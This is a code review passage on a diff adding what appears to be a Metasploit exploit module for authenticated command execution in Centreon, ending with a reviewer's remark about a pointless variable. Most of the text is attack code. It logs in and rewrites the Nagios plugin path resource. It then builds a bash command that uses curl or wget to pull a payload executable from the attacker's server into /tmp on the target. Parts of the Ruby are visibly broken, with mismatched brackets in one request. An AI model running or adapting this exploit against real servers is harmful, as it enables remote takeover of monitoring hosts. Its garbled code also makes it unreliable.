modules/exploits/linux/http/centreon_cmd_exec.rb

```diff
@@ -0,0 +1,176 @@
+        OptString.new("METHOD", [true, "The method used to download shell from target (default is curl)", "curl"]),
+        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
+      ]
+    )
+  end
+
+  def exploit
+    begin
+      res = send_request_cgi(
+        "uri" => normalize_uri(target_uri.path, "index.php"),
+        "method" => "GET",
+      )
+      @phpsessid = res.get_cookies
+      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
+
+      if token
+        res = send_request_cgi!(
+          "uri" => normalize_uri(target_uri.path, "index.php"),
+          "method" => "POST",
+          "cookie" => @phpsessid,
+          "vars_post" => {
+            "useralias" => datastore["USERNAME"],
+            "password" => datastore["PASSWORD"],
+            "centreon_token" => token,
+          },
+        )
+        if res.body.include? "You need to enable JavaScript to run this app"
+          print_good("Login Successful!")
+          res = send_request_cgi(
+            "uri" => normalize_uri(target_uri.path, "main.get.php"),
+            "method" => "GET",
+            "cookie" => @phpsessid,
+            "vars_get" => {
+              "p" => "60904",
+              "o" => "c",
+              "resource_id" => 1,
+            },
+          )
+          /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
+          res = send_request_cgi(
+            "uri" => normalize_uri(target_uri.path, "main.get.php"),
+            "vars_get" => {
+              "p" => "60904",
+              },
+            ),
+            "method" => "POST",
+            "cookie" => @phpsessid,
+            "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token },
+          )
+          begin
+            Timeout.timeout(datastore["HTTPDELAY"]) { super }
+          rescue Timeout::Error
+            vprint_error("Server Timed Out...")
+          end
+        else
+          vprint_error("Cannot login to Centreon")
+        end
+      else
+        vprint_error("Couldn't get token, check your TARGETURI")
+      end
+    rescue ::Rex::ConnectionError
+      vprint_error("Connection error...")
+    end
+  end
+
+  def primer
+    @pl = generate_payload_exe
+    @path = service.resources.keys[0]
+    binding_ip = srvhost_addr
+
+    proto = datastore["SSL"] ? "https" : "http"
+    payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
+    send_payload(payload_uri)
+  end
+
+  def send_payload(payload_uri)
+    payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\""
+    print_good("Sending Payload")
+    res = send_request_cgi(
```

Comment:
Pointless variable declaration.

```suggestion
    send_request_cgi(
```